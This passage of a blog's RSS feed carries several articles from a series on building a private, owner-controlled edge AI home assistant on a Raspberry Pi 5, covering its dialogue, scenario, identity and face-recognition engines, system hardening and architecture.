Intents are categorized into a small, finite set:&lt;br&gt;– informational query&lt;br&gt;– command request&lt;br&gt;– conversational response&lt;br&gt;– system clarification&lt;br&gt;Free-form intent creation is explicitly forbidden.&lt;br&gt;&lt;img alt="" src="https://www.altexsoft.com/static/blog-post/2023/11/738ab7a9-2857-49e7-9eb4-03e366d89370.jpg" style="height:289px; width:515px"&gt;&lt;br&gt;Context Binding&lt;br&gt;Extracted intent is enriched with identity context from the Identity Engine and state context from the Scenario Engine. This step determines what information and actions are allowed. Context binding is where permissions are enforced, not later.&lt;br&gt;&lt;br&gt;Response Strategy&lt;br&gt;Responses follow a tiered strategy:&lt;br&gt;1) Local deterministic response (status, greetings)&lt;br&gt;2) Local knowledge retrieval (cached facts, summaries)&lt;br&gt;3) External API query (LLM or search), if explicitly allowed&lt;br&gt;The Dialogue Engine never decides which tier to use arbitrarily; the scenario defines allowed tiers.&lt;br&gt;&lt;br&gt;Use of Language Models&lt;br&gt;Language models are treated as external tools, not authorities. Prompts are structured, constrained, and identity-aware. Model output is post-processed and filtered before delivery. The assistant never exposes raw model output directly to the user.&lt;br&gt;&lt;br&gt;Conversation Memory&lt;br&gt;Conversation memory is short-lived and contextual. Long-term memory is not stored in the Dialogue Engine. Persistent preferences and interests belong to the Owner profile, not to conversational logs. This avoids unintended profiling.&lt;br&gt;&lt;br&gt;Clarification and Ambiguity&lt;br&gt;When intent confidence is low, the assistant asks clarifying questions or responds neutrally. Guessing is prohibited. A safe response is always preferred over a clever one.&lt;br&gt;&lt;br&gt;Voice Output&lt;br&gt;Text-to-Speech uses predefined voice profiles per scenario or identity. 
Voice output reflects role and context but does not adapt dynamically based on emotional inference. Consistency builds trust.&lt;br&gt;&lt;br&gt;Failure Modes&lt;br&gt;Common failures include background noise, overlapping speech, or ambiguous phrasing. The Dialogue Engine handles these by declining action, requesting repetition, or returning informational responses only. Failures never trigger automation.&lt;br&gt;&lt;br&gt;Security Constraints&lt;br&gt;The Dialogue Engine enforces:&lt;br&gt;– no execution of commands without scenario approval&lt;br&gt;– no prompt injection propagation&lt;br&gt;– no identity override via conversation&lt;br&gt;– no hidden system state disclosure&lt;br&gt;All responses are traceable to a scenario and intent.&lt;br&gt;&lt;br&gt;Testing and Validation&lt;br&gt;Dialogue behavior must be testable via text-only simulation. Audio is optional during development. Intent classification, context binding, and response filtering should be validated independently before full integration.&lt;br&gt;&lt;br&gt;Integration with Other Engines&lt;br&gt;The Dialogue Engine consumes identity and scenario context and produces bounded responses. It does not modify identity, scenarios, or automation rules. Control always returns to the Scenario Engine.&lt;br&gt;&lt;br&gt;What Comes Next&lt;br&gt;With controlled conversation in place, the next article introduces the Information and Knowledge Engine: news retrieval, topic filtering, summarization, and owner-personalized information flows.&lt;br&gt;&amp;nbsp;&lt;/p&gt;</description>
<category>Designing a Private Edge AI Home Assistant on Raspberry Pi 5</category>
<guid isPermaLink="true">https://asky.uk/118/dialogue-engine-controlled-conversation-on-the-edge</guid>
<pubDate>Tue, 13 Jan 2026 08:23:04 +0000</pubDate>
</item>
<item>
<title>Scenario Engine: Event-Driven Behavior Without Autonomy</title>
<link>https://asky.uk/117/scenario-engine-event-driven-behavior-without-autonomy</link>
<description>&lt;p&gt;Scenario Engine: Event-Driven Behavior Without Autonomy&lt;br&gt;Designing Deterministic Actions on the Edge&lt;br&gt;&lt;br&gt;Introduction&lt;br&gt;The Scenario Engine is where perception and identity become action. Its role is not to “think” or decide freely, but to execute predefined responses to well-defined events. By design, it prevents autonomy while enabling rich, predictable behavior. This engine ensures the assistant remains useful without becoming unsafe or opaque.&lt;br&gt;&lt;br&gt;Why Event-Driven Design&lt;br&gt;Continuous decision loops are unnecessary and risky for a home assistant. An event-driven model reacts only to explicit triggers: identity resolution, speech intent, time schedules, or system states. This minimizes resource usage, reduces complexity, and guarantees traceability of actions.&lt;br&gt;&lt;br&gt;Core Concepts&lt;br&gt;The Scenario Engine is built around three primitives:&lt;br&gt;– Events: signals emitted by other engines&lt;br&gt;– Conditions: checks against context and state&lt;br&gt;– Actions: deterministic outputs&lt;br&gt;No scenario may create new rules at runtime. All logic is declared ahead of time.&lt;br&gt;&lt;br&gt;Event Sources&lt;br&gt;Typical events include:&lt;br&gt;– IdentityResolved(owner | guest | unknown)&lt;br&gt;– SpeechIntent(command, confidence)&lt;br&gt;– TimeEvent(schedule or interval)&lt;br&gt;– SystemEvent(startup, error, idle)&lt;br&gt;Events are immutable facts, not suggestions.&lt;br&gt;&lt;br&gt;Scenario Definition&lt;br&gt;A scenario is a static rule set bound to one or more events. It defines:&lt;br&gt;– priority&lt;br&gt;– required identity type&lt;br&gt;– optional conditions&lt;br&gt;– ordered actions&lt;br&gt;Scenarios never call each other recursively. This avoids emergent behavior.&lt;br&gt;&lt;br&gt;Priority and Conflict Resolution&lt;br&gt;Only one scenario may execute at a time. 
Priority rules are strict:&lt;br&gt;1) Owner-related scenarios override all others&lt;br&gt;2) Identity-based scenarios override time-based ones&lt;br&gt;3) Safety and system scenarios override informational ones&lt;br&gt;If no scenario matches, the system does nothing.&lt;br&gt;&lt;br&gt;Actions&lt;br&gt;Actions are simple, auditable operations:&lt;br&gt;– speak text via TTS&lt;br&gt;– play a sound&lt;br&gt;– send a notification&lt;br&gt;– query information&lt;br&gt;– trigger an automation endpoint&lt;br&gt;Actions cannot modify identity, permissions, or scenario definitions.&lt;br&gt;&lt;br&gt;State Management&lt;br&gt;The Scenario Engine maintains minimal state:&lt;br&gt;– current active scenario&lt;br&gt;– last executed scenario&lt;br&gt;– cooldown timers&lt;br&gt;State is transient and resettable. There is no long-term behavioral memory in this layer.&lt;br&gt;&lt;br&gt;Cooldowns and Rate Limiting&lt;br&gt;To prevent repetitive behavior, scenarios may define cooldown periods. For example, a greeting scenario should not trigger repeatedly while a person remains in view. Cooldowns are enforced strictly and do not adapt dynamically.&lt;br&gt;&lt;br&gt;Safety Constraints&lt;br&gt;The Scenario Engine enforces hard limits:&lt;br&gt;– no chained execution beyond a fixed depth&lt;br&gt;– no external actions without explicit allowance&lt;br&gt;– no self-modifying rules&lt;br&gt;– no learning from outcomes&lt;br&gt;This guarantees deterministic behavior.&lt;br&gt;&lt;br&gt;Testing and Simulation&lt;br&gt;Scenarios must be testable without live sensors. Events can be injected manually to validate priority, conditions, and actions. This enables safe iteration and regression testing before deployment.&lt;br&gt;&lt;br&gt;Failure Handling&lt;br&gt;If an action fails, the scenario terminates cleanly. Errors are logged, not retried automatically unless explicitly defined. 
Failure never escalates privileges or triggers fallback intelligence.&lt;br&gt;&lt;br&gt;Integration with Dialogue and Automation&lt;br&gt;The Scenario Engine passes bounded context to Dialogue and Automation Engines. Those engines execute tasks but cannot alter scenario flow. Control always returns to the Scenario Engine after execution.&lt;/p&gt;&lt;p&gt;&lt;img alt="" src="https://tse1.mm.bing.net/th/id/OIP.Z1X3pRjEdCFWufZNwSuMZQHaDh?w=474&amp;amp;h=379&amp;amp;c=7&amp;amp;p=0" style="height:460px; width:575px"&gt;&lt;br&gt;&lt;br&gt;What Comes Next&lt;br&gt;With deterministic behavior established, the next article focuses on the Dialogue Engine: speech, intent extraction, and controlled conversational interaction without turning the assistant into an open-ended agent.&lt;br&gt;&amp;nbsp;&lt;/p&gt;</description>
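The event, condition, and priority rules above can be sketched as a small deterministic selector. Names such as `Scenario` and `select_scenario` are illustrative assumptions; the point is that matching is static and exactly one (or zero) scenario runs per event.

```python
from dataclasses import dataclass
from typing import Callable

# Illustrative sketch: deterministic scenario selection by strict priority.
@dataclass
class Scenario:
    name: str
    priority: int                    # lower number = higher priority
    matches: Callable[[dict], bool]  # static condition, declared ahead of time

def select_scenario(event, scenarios):
    """At most one scenario runs; if nothing matches, the system does nothing."""
    candidates = [s for s in scenarios if s.matches(event)]
    if not candidates:
        return None
    return min(candidates, key=lambda s: s.priority)

scenarios = [
    Scenario("owner_greeting", 1, lambda e: e.get("identity") == "owner"),
    Scenario("hourly_chime",   3, lambda e: e.get("type") == "TimeEvent"),
]
evt = {"type": "IdentityResolved", "identity": "owner"}
print(select_scenario(evt, scenarios).name)   # -> owner_greeting
```

Because events can be plain dictionaries, this selector is trivially testable by injecting synthetic events, exactly as the testing section recommends.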
<category>Designing a Private Edge AI Home Assistant on Raspberry Pi 5</category>
<guid isPermaLink="true">https://asky.uk/117/scenario-engine-event-driven-behavior-without-autonomy</guid>
<pubDate>Tue, 13 Jan 2026 08:18:54 +0000</pubDate>
</item>
<item>
<title>Identity Engine: Owner, Guests, and Scenarios Establishing Trust, Control, and Meaningful Interaction</title>
<link>https://asky.uk/116/identity-scenarios-establishing-control-meaningful-interactio</link>
<description>&lt;p&gt;Introduction&lt;br&gt;The Identity Engine is the system’s trust boundary. Vision can suggest who is present, but identity defines what that presence means. Without a strict identity model, personalization becomes unsafe and unpredictable. This engine translates recognition into controlled, meaningful interaction while preserving ownership and security.&lt;br&gt;&lt;br&gt;Core Identity Model&lt;br&gt;The system operates with a strict hierarchy:&lt;br&gt;– Owner (root identity)&lt;br&gt;– Recognized guests&lt;br&gt;– Unknown presence&lt;br&gt;There are no peer users and no shared administration. This mirrors a root-based security model rather than a social platform.&lt;br&gt;&lt;br&gt;Owner Identity&lt;br&gt;There is exactly one Owner. The Owner configures the system, enrolls identities, defines scenarios, manages API access, and owns all data. The Owner can audit logs, adjust thresholds, and disable modules. No other identity can modify system behavior. Ownership is explicit and non-transferable without reinitialization.&lt;br&gt;&lt;br&gt;Recognized Guests&lt;br&gt;Guests are identified individuals with no permissions. They cannot access data, configure behavior, or trigger administrative actions. Their identity exists only to enable predefined scenarios. Recognition does not imply trust beyond what the Owner has explicitly defined.&lt;br&gt;&lt;br&gt;Unknown Presence&lt;br&gt;Unknown individuals are treated neutrally. The system does not attempt identification, does not store embeddings, and does not trigger personalized scenarios. Unknown presence may optionally trigger generic actions such as a neutral greeting or no response at all.&lt;br&gt;&lt;br&gt;Identity Resolution Flow&lt;br&gt;Identity resolution occurs only after the Vision Engine produces a candidate with sufficient confidence. 
The Identity Engine verifies:&lt;br&gt;– confidence threshold&lt;br&gt;– enrollment validity&lt;br&gt;– identity status (owner, guest, unknown)&lt;br&gt;Only then does it pass context to higher layers. Failed resolution results in an unknown identity state.&lt;br&gt;&lt;br&gt;Scenario Concept&lt;br&gt;A scenario is a deterministic response template bound to an identity or event. Scenarios define how the assistant behaves, not what it decides. This separation prevents emergent or unintended behavior.&lt;br&gt;&lt;br&gt;Scenario Structure&lt;br&gt;Each scenario may include:&lt;br&gt;– greeting text&lt;br&gt;– voice profile&lt;br&gt;– allowed information scope&lt;br&gt;– optional notifications&lt;br&gt;– automation triggers&lt;br&gt;Scenarios are static definitions evaluated at runtime. They do not modify themselves.&lt;br&gt;&lt;br&gt;Examples&lt;br&gt;Owner scenario:&lt;br&gt;“Welcome back. You have two new emails and a scheduled meeting in one hour.”&lt;br&gt;Guest scenario:&lt;br&gt;“Hello John. Nice to see you.”&lt;br&gt;Unknown scenario:&lt;br&gt;No response or neutral acknowledgment.&lt;br&gt;&lt;br&gt;Scenario Selection Rules&lt;br&gt;Only one scenario may be active at a time. Identity-based scenarios override time-based or ambient scenarios. Owner presence always supersedes guest presence. Ambiguous identity states fall back to unknown.&lt;br&gt;&lt;br&gt;Security Guarantees&lt;br&gt;The Identity Engine enforces:&lt;br&gt;– no privilege escalation&lt;br&gt;– no dynamic permission grants&lt;br&gt;– no identity chaining&lt;br&gt;– no learning from behavior&lt;br&gt;This guarantees that the system cannot evolve into a multi-user or shared-control assistant unintentionally.&lt;br&gt;&lt;br&gt;Auditability&lt;br&gt;All identity decisions are logged as metadata events without storing biometric data. Logs include timestamps, resolved identity category, and scenario selected. 
This enables review without exposing sensitive content.&lt;br&gt;&lt;br&gt;Failure and Misidentification Handling&lt;br&gt;Misidentification is treated as a system fault, not user error. Conservative thresholds minimize false positives. When confidence is insufficient, the system defaults to unknown. It is always safer to miss recognition than to misidentify.&lt;br&gt;&lt;br&gt;Integration with Other Engines&lt;br&gt;The Identity Engine outputs a clean context object: identity type, name (if applicable), and scenario reference. Dialogue and Automation Engines operate strictly within this context and cannot bypass identity constraints.&lt;br&gt;&lt;br&gt;What Comes Next&lt;br&gt;With identity and trust boundaries defined, the next article focuses on the Scenario Engine in depth: designing scalable scenario logic, prioritization rules, and event-driven behavior without turning the assistant into an autonomous agent.&lt;/p&gt;&lt;p&gt;&lt;img alt="" src="https://media.geeksforgeeks.org/wp-content/uploads/20221215162638/IAM-Architecture-2.png" style="height:270px; width:540px"&gt;&lt;br&gt;&amp;nbsp;&lt;/p&gt;</description>
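The resolution flow above (confidence threshold, enrollment validity, identity status) can be expressed as one pure function. The name `resolve_identity` and the 0.8 threshold are assumptions for illustration; the conservative fallback to unknown is the article's rule.

```python
# Illustrative sketch of the resolution flow: threshold, enrollment, status.
def resolve_identity(candidate, confidence, enrolled, threshold=0.8):
    """Conservative resolution: low confidence or unenrolled means unknown."""
    confident = candidate is not None and confidence >= threshold
    if not confident or candidate not in enrolled:
        return {"identity": "unknown", "name": None}
    return {"identity": enrolled[candidate]["role"], "name": candidate}

enrolled = {"alice": {"role": "owner"}, "john": {"role": "guest"}}
print(resolve_identity("alice", 0.93, enrolled))  # owner context
print(resolve_identity("alice", 0.55, enrolled))  # low confidence: unknown
print(resolve_identity("bob", 0.99, enrolled))    # not enrolled: unknown
```

The returned context object is all that higher layers ever see: identity type and name, never embeddings or raw scores.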
<category>Designing a Private Edge AI Home Assistant on Raspberry Pi 5</category>
<guid isPermaLink="true">https://asky.uk/116/identity-scenarios-establishing-control-meaningful-interactio</guid>
<pubDate>Fri, 09 Jan 2026 18:33:32 +0000</pubDate>
</item>
<item>
<title>Vision Engine: Face Detection and Recognition on the Edge</title>
<link>https://asky.uk/115/vision-engine-face-detection-and-recognition-on-the-edge</link>
<description>&lt;p&gt;Introduction&lt;br&gt;The Vision Engine is the assistant’s perceptual foundation. Its purpose is not surveillance, tracking, or behavioral analysis. It answers a single, constrained question: is a known person present, and if so, who? Everything in its design follows from this limitation. Correctly implemented, the Vision Engine enables personalization without compromising privacy or system trust.&lt;br&gt;&lt;br&gt;Detection vs Recognition&lt;br&gt;Face detection and face recognition are often confused but serve different roles. Detection answers “is there a face in the frame?” Recognition answers “whose face is this?” Detection is lightweight and continuous; recognition is heavier and event-driven. Separating the two is critical for performance and privacy. Detection runs frequently, recognition only when necessary.&lt;br&gt;&lt;br&gt;Design Principles&lt;br&gt;The Vision Engine follows four non-negotiable principles:&lt;br&gt;– local processing only&lt;br&gt;– no continuous recording&lt;br&gt;– no raw image storage&lt;br&gt;– explicit owner-controlled enrollment&lt;br&gt;Frames are processed in memory and discarded immediately. Only numerical embeddings are stored.&lt;br&gt;&lt;br&gt;Camera Strategy&lt;br&gt;Use a single fixed camera covering an entry zone. Wide-angle lenses reduce blind spots but increase distortion; moderate field-of-view lenses simplify embeddings. Native CSI cameras are preferred for lower latency and CPU overhead. USB cameras are acceptable but less deterministic under load.&lt;br&gt;&lt;br&gt;Face Detection Pipeline&lt;br&gt;Face detection should be fast, robust, and tolerant to lighting changes. The detector’s only responsibility is to locate faces and provide bounding boxes. False positives are acceptable; missed detections should be rare. 
Detection runs continuously at a reduced frame rate to conserve resources.&lt;br&gt;&lt;br&gt;Recognition Pipeline&lt;br&gt;Recognition is triggered only when:&lt;br&gt;– a face remains in view for a minimum time&lt;br&gt;– the bounding box is stable&lt;br&gt;– detection confidence exceeds a threshold&lt;br&gt;The cropped face is converted into an embedding vector using a lightweight neural model. This vector represents facial features numerically and contains no reconstructable image data.&lt;br&gt;&lt;br&gt;Embedding Database&lt;br&gt;Each known person is represented by multiple embeddings generated from different reference photos. These are stored locally in a simple database (file-based, SQLite, or vector index). Matching uses cosine similarity or Euclidean distance. Thresholds must be conservative to avoid misidentification.&lt;br&gt;&lt;br&gt;Enrollment Process&lt;br&gt;Only the owner can enroll new identities. Enrollment consists of uploading several reference images under controlled lighting and angles. Embeddings are generated once and stored. No further learning occurs automatically. This prevents silent drift and identity corruption.&lt;br&gt;&lt;br&gt;Decision Logic&lt;br&gt;Recognition results are never binary. Each match includes a confidence score. The system reacts only above a strict acceptance threshold. Below threshold, the face is treated as unknown. Unknown faces trigger no scenarios and no logging beyond transient system metrics.&lt;br&gt;&lt;br&gt;Privacy Safeguards&lt;br&gt;The Vision Engine does not:&lt;br&gt;– stream video externally&lt;br&gt;– archive frames&lt;br&gt;– perform emotion or behavior analysis&lt;br&gt;– identify unknown individuals&lt;br&gt;Physical camera indicators are recommended. The system must be auditable and predictable.&lt;br&gt;&lt;br&gt;Performance Considerations&lt;br&gt;Raspberry Pi 5 can sustain real-time detection and event-based recognition concurrently if frame rates are controlled. 
Detection should be decoupled from recognition threads. CPU affinity and memory locality improve latency consistency. Thermal stability directly affects recognition reliability.&lt;br&gt;&lt;br&gt;Failure Modes&lt;br&gt;Common failure modes include poor lighting, occlusions, and extreme angles. These are acceptable limitations. The system must fail safely by treating uncertain inputs as unknown rather than guessing.&lt;br&gt;&lt;br&gt;Integration with Identity Engine&lt;br&gt;The Vision Engine outputs only one thing: a candidate identity with confidence. All decisions beyond that point belong to the Identity and Scenario Engines. This strict separation prevents accidental coupling between perception and behavior.&lt;br&gt;&lt;br&gt;What Comes Next&lt;br&gt;With visual perception in place, the next article introduces the Identity Engine in detail: ownership, trust boundaries, scenario mapping, and how recognized faces become meaningful interactions rather than raw labels.&lt;br&gt;&lt;img alt="" src="https://encrypted-tbn0.gstatic.com/images?q=tbn:ANd9GcSCfxmzdA1n88uRpZPs5qtvz1A9e6Ffnw00ZA&amp;amp;s" style="height:401px; width:645px"&gt;&lt;/p&gt;</description>
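The embedding-matching step described above (multiple embeddings per person, cosine similarity, conservative threshold) can be sketched as follows. The function names and the 0.85 threshold are illustrative assumptions; in practice the threshold must be tuned against enrollment data.

```python
import math

# Illustrative sketch: cosine matching against multiple embeddings per person.
def cosine(a, b):
    dot = sum(x * y for x, y in zip(a, b))
    na = math.sqrt(sum(x * x for x in a))
    nb = math.sqrt(sum(x * x for x in b))
    return dot / (na * nb)

def match(embedding, db, threshold=0.85):
    """Return (name, score) for the best match, or (None, score) if unknown."""
    best_name, best_score = None, -1.0
    for name, vectors in db.items():
        for v in vectors:
            s = cosine(embedding, v)
            if s > best_score:
                best_name, best_score = name, s
    if best_score >= threshold:
        return best_name, best_score
    return None, best_score          # fail safe: treat as unknown

# toy 3-dimensional vectors stand in for real embedding vectors
db = {"owner": [[1.0, 0.0, 0.2]], "guest": [[0.0, 1.0, 0.0]]}
name, score = match([0.9, 0.05, 0.18], db)
print(name)   # -> owner
```

Returning a score alongside the name keeps the decision non-binary, as required: the caller applies the acceptance threshold, and anything below it is unknown.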
<category>Designing a Private Edge AI Home Assistant on Raspberry Pi 5</category>
<guid isPermaLink="true">https://asky.uk/115/vision-engine-face-detection-and-recognition-on-the-edge</guid>
<pubDate>Fri, 09 Jan 2026 18:27:43 +0000</pubDate>
</item>
<item>
<title>Preparing Raspberry Pi 5 for Edge AI: Operating System, Performance, Storage, Cooling, and Security</title>
<link>https://asky.uk/114/preparing-raspberry-operating-performance-storage-security</link>
<description>Introduction&lt;br /&gt;
Before writing a single line of AI code, the Raspberry Pi must be treated as what it really is in this project: a small edge server. Stability, predictable performance, thermal control, and security matter more than convenience. This article prepares Raspberry Pi 5 (16 GB RAM) as a reliable Edge AI platform suitable for continuous operation in a home environment.&lt;br /&gt;
&lt;br /&gt;
Operating System Selection&lt;br /&gt;
For Edge AI, the operating system must be lightweight, stable, and well supported. Raspberry Pi OS Lite (64-bit) is the recommended baseline. It avoids unnecessary desktop overhead while maintaining full hardware support and long-term updates. Ubuntu Server is viable but introduces additional latency, memory overhead, and less predictable GPIO and camera behavior. Desktop environments are explicitly discouraged for always-on AI workloads.&lt;br /&gt;
&lt;br /&gt;
Initial System Setup&lt;br /&gt;
Flash Raspberry Pi OS Lite (64-bit). On first boot:&lt;br /&gt;
– expand filesystem&lt;br /&gt;
– set locale and timezone&lt;br /&gt;
– disable unused services&lt;br /&gt;
– enable SSH (key-based authentication only)&lt;br /&gt;
– update firmware and packages&lt;br /&gt;
The system should boot cleanly with minimal background processes.&lt;br /&gt;
&lt;br /&gt;
Storage Strategy&lt;br /&gt;
AI workloads stress storage through logging, temporary buffers, and model loading. A high-quality NVMe SSD via PCIe is strongly recommended over SD cards. Benefits include higher I/O throughput, lower latency, and dramatically improved reliability. The OS, logs, embeddings, and models should all reside on NVMe. SD cards should be avoided except for recovery.&lt;br /&gt;
&lt;br /&gt;
Memory Management&lt;br /&gt;
16 GB RAM allows generous buffering but must still be managed. Enable zram to reduce swap pressure and avoid SD or SSD thrashing. Traditional disk swap should be minimal or disabled entirely. AI inference benefits from memory locality; avoid aggressive overcommit. Monitor memory usage early to establish baseline behavior.&lt;br /&gt;
&lt;br /&gt;
CPU Performance Tuning&lt;br /&gt;
By default, Raspberry Pi dynamically scales CPU frequency. For AI workloads, consistency matters more than peak bursts. Set the CPU governor to “performance” for deterministic latency. Disable unnecessary throttling features while respecting thermal limits. This improves frame-to-frame timing for vision and audio pipelines.&lt;br /&gt;
&lt;br /&gt;
Thermal Design&lt;br /&gt;
Thermal stability is critical. Raspberry Pi 5 can throttle aggressively under sustained load. Passive cooling is insufficient for continuous AI workloads. Use an active cooling solution: a heatsink with fan or an active case. Monitor temperature under load; sustained operation should remain well below throttling thresholds. Stable thermals equal stable inference timing.&lt;br /&gt;
&lt;br /&gt;
Camera and Peripheral Configuration&lt;br /&gt;
Enable the CSI camera interface early. Use native camera modules when possible to reduce USB overhead and latency. USB cameras are acceptable but consume additional bandwidth and CPU cycles. Disable unused interfaces (Bluetooth, Wi-Fi, HDMI) if not required to reduce power draw and noise.&lt;br /&gt;
&lt;br /&gt;
Audio Subsystem Preparation&lt;br /&gt;
Audio input must be reliable and low-latency. USB microphones are preferred over analog solutions. Disable unused ALSA devices and confirm stable sampling rates. Test continuous audio capture early to detect buffer underruns or driver instability.&lt;br /&gt;
&lt;br /&gt;
Security Hardening&lt;br /&gt;
This system processes sensitive data by design. Apply basic hardening:&lt;br /&gt;
– SSH keys only, no passwords&lt;br /&gt;
– firewall enabled with minimal open ports&lt;br /&gt;
– services bound to localhost by default&lt;br /&gt;
– no cloud sync or telemetry&lt;br /&gt;
– physical access considered trusted only for the owner&lt;br /&gt;
Security is not optional; it is part of system correctness.&lt;br /&gt;
&lt;br /&gt;
Service Layout Philosophy&lt;br /&gt;
Treat the system as modular services, not scripts. Each major function (vision, identity, dialogue, automation) should eventually run as an isolated service or container. Even at early stages, adopt clean directory structures and logging conventions. This prevents architectural decay as complexity grows.&lt;br /&gt;
&lt;br /&gt;
Baseline Validation&lt;br /&gt;
Before proceeding, validate:&lt;br /&gt;
– stable boot and shutdown&lt;br /&gt;
– no thermal throttling under load&lt;br /&gt;
– camera and microphone operate reliably&lt;br /&gt;
– storage I/O is consistent&lt;br /&gt;
– system remains responsive over hours of operation&lt;br /&gt;
Only after this baseline is confirmed should AI components be introduced.&lt;br /&gt;
&lt;br /&gt;
What Comes Next&lt;br /&gt;
With the platform prepared, the next article introduces the Vision Engine: face detection and recognition using locally generated embeddings. We move from infrastructure to perception, while preserving privacy and determinism.</description>
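Part of the baseline validation (the "no thermal throttling under load" check) can be automated. As a sketch, the following decodes the bitmask printed by the Raspberry Pi `vcgencmd get_throttled` command; the bit meanings follow the official Raspberry Pi documentation, while the function name is an illustrative assumption.

```python
# Sketch: decode the bitmask printed by `vcgencmd get_throttled` on the Pi.
# Bit meanings follow the official Raspberry Pi documentation.
FLAGS = {
    0:  "under-voltage now",
    1:  "ARM frequency capped now",
    2:  "throttled now",
    3:  "soft temperature limit now",
    16: "under-voltage occurred",
    17: "ARM frequency capping occurred",
    18: "throttling occurred",
    19: "soft temperature limit occurred",
}

def decode_throttled(raw):
    """Parse e.g. 'throttled=0x50000' into human-readable flags."""
    value = int(raw.split("=")[1], 16)
    # a bit is set when the corresponding power-of-two divides in with remainder 1
    return [msg for bit, msg in FLAGS.items() if (value // 2 ** bit) % 2]

print(decode_throttled("throttled=0x0"))       # empty list: healthy baseline
print(decode_throttled("throttled=0x50000"))   # past under-voltage and throttling
```

Running this check after an hour of sustained load tells you whether the cooling solution is adequate before any AI component is installed.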
<category>Designing a Private Edge AI Home Assistant on Raspberry Pi 5</category>
<guid isPermaLink="true">https://asky.uk/114/preparing-raspberry-operating-performance-storage-security</guid>
<pubDate>Thu, 08 Jan 2026 21:16:59 +0000</pubDate>
</item>
<item>
<title>Architecture, Identity, and Control</title>
<link>https://asky.uk/113/architecture-identity-and-control</link>
<description>&lt;p&gt;&lt;img alt="" src="https://piaustralia.com.au/cdn/shop/articles/rpi-home-automation.png?v=1716599832&amp;amp;width=1600" style="height:560px; width:560px"&gt;&lt;br&gt;Introduction&lt;br&gt;Most consumer “smart assistants” are not assistants but cloud terminals. Audio, video, and context are captured locally, while intelligence and decision-making happen elsewhere. This architecture is convenient, but incompatible with privacy, ownership, and deep personalization. This article series explores a different approach: a private, owner-controlled AI assistant running locally on Raspberry Pi 5 (16 GB RAM). The system recognizes specific people, reacts with personalized behavior, communicates naturally, retrieves information, and integrates smart functionality, while keeping perception and identity on the edge.&lt;br&gt;&lt;br&gt;Edge AI vs Cloud Assistants&lt;br&gt;Cloud-first assistants offer massive compute and rapid iteration, but suffer from permanent data exfiltration, limited identity isolation, vendor lock-in, and unverifiable behavior. An edge-first assistant trades unlimited scale for determinism, privacy, offline capability, and full control. 
This project adopts a hybrid edge philosophy: perception, identity, memory, and automation are local; external APIs are used selectively for language and information retrieval.&lt;br&gt;&lt;br&gt;System Boundaries&lt;br&gt;Clear boundaries prevent scope creep.&lt;br&gt;The assistant IS:&lt;br&gt;– single-owner&lt;br&gt;– identity-aware&lt;br&gt;– event-driven&lt;br&gt;– locally perceptive (vision + audio)&lt;br&gt;– modular and inspectable&lt;br&gt;The assistant IS NOT:&lt;br&gt;– a surveillance system&lt;br&gt;– a multi-user platform&lt;br&gt;– a cloud mirror&lt;br&gt;– an autonomous agent with open permissions&lt;br&gt;– a replacement for personal devices&lt;br&gt;&lt;br&gt;High-Level Architecture&lt;br&gt;The system is composed of five cooperating engines:&lt;br&gt;Vision Engine → detects presence&lt;br&gt;Identity Engine → resolves who is present&lt;br&gt;Scenario Engine → selects behavior&lt;br&gt;Dialogue Engine → communicates&lt;br&gt;Automation/Services → executes actions&lt;br&gt;Each module is loosely coupled and replaceable.&lt;br&gt;&lt;br&gt;Vision Engine&lt;br&gt;The Vision Engine answers a narrow question: is a known person present? It does not perform continuous recording or remote streaming. The owner uploads reference photos; face embeddings are generated and stored locally. Matching is event-based. Raw images are not retained. This is recognition, not surveillance.&lt;br&gt;&lt;br&gt;Identity Engine&lt;br&gt;Identity is central. There is exactly one Owner identity. The owner configures the system, approves known individuals, defines scenarios, controls API access, and owns all data. Other people are recognized but have no permissions. They are mapped only to scenarios and responses. This mirrors a root/user separation model.&lt;br&gt;&lt;br&gt;Scenario Engine&lt;br&gt;A scenario defines how the assistant reacts to a specific identity or event. It includes greeting style, voice tone, optional notifications, and automation triggers. 
Examples: “Welcome home, John. You received an email an hour ago.” or “Hello Uncle Alan. Good to see you.” Scenarios are explicit, inspectable, and reversible.&lt;br&gt;&lt;br&gt;Dialogue Engine&lt;br&gt;Conversation is handled by a controlled dialogue engine. Speech is converted to text, enriched with identity context, filtered through scope rules, and routed either locally or via selected APIs. The assistant does not decide what it is allowed to do; it only responds within predefined limits. This prevents accidental autonomy.&lt;br&gt;&lt;br&gt;Why Raspberry Pi 5 (16 GB)&lt;br&gt;Raspberry Pi 5 finally makes serious home Edge AI practical. It can run face recognition pipelines, vector databases, audio processing, and multiple concurrent services reliably. The 16 GB RAM variant provides headroom for embeddings, buffers, and future expansion. This is not excess—it is engineering margin.&lt;br&gt;&lt;br&gt;Privacy and Ethics by Design&lt;br&gt;Privacy is enforced architecturally, not by policy. Cameras and microphones process locally. No silent uploads. No background analytics. Physical indicators are recommended. Trust emerges from predictable, inspectable behavior.&lt;br&gt;&lt;br&gt;What Comes Next&lt;br&gt;This article defined the architectural foundation and constraints. The next article covers preparing Raspberry Pi 5 for Edge AI: OS selection, performance tuning, storage, cooling, and security hardening. Step by step, the series will lead to a fully functional personal AI assistant that remains under the owner’s control.&lt;br&gt;&amp;nbsp;&lt;/p&gt;</description>
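The five-engine flow above can be illustrated as one bounded, linear hand-off. Everything here is stubbed and the function names are assumptions; the point is the shape: perception produces a candidate, identity produces a context, and the scenario layer decides what, if anything, is said.

```python
# Illustrative only: the engine chain as one bounded, linear hand-off.
def vision_engine(frame):
    # would run detection plus embedding; stubbed with a fixed candidate
    return {"candidate": "John", "confidence": 0.91}

def identity_engine(signal, enrolled=("John",)):
    confident = signal["confidence"] >= 0.8 and signal["candidate"] in enrolled
    if confident:
        return {"identity": "guest", "name": signal["candidate"]}
    return {"identity": "unknown", "name": None}

def scenario_engine(ctx):
    if ctx["identity"] == "guest":
        return f"Hello {ctx['name']}. Nice to see you."
    return None   # unknown presence: no response at all

greeting = scenario_engine(identity_engine(vision_engine(frame=None)))
print(greeting)   # -> Hello John. Nice to see you.
```

Each engine consumes only the previous engine's output, which is what makes the modules loosely coupled and individually replaceable.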
<category>Designing a Private Edge AI Home Assistant on Raspberry Pi 5</category>
<guid isPermaLink="true">https://asky.uk/113/architecture-identity-and-control</guid>
<pubDate>Thu, 08 Jan 2026 21:09:38 +0000</pubDate>
</item>
<item>
<title>Multi-Zone Traffic Analytics (Multiple Lines + Directions) on Raspberry Pi</title>
<link>https://asky.uk/111/multi-traffic-analytics-multiple-lines-directions-raspberry</link>
<description>Hardware: Raspberry Pi 4 / Raspberry Pi 5&lt;br /&gt;
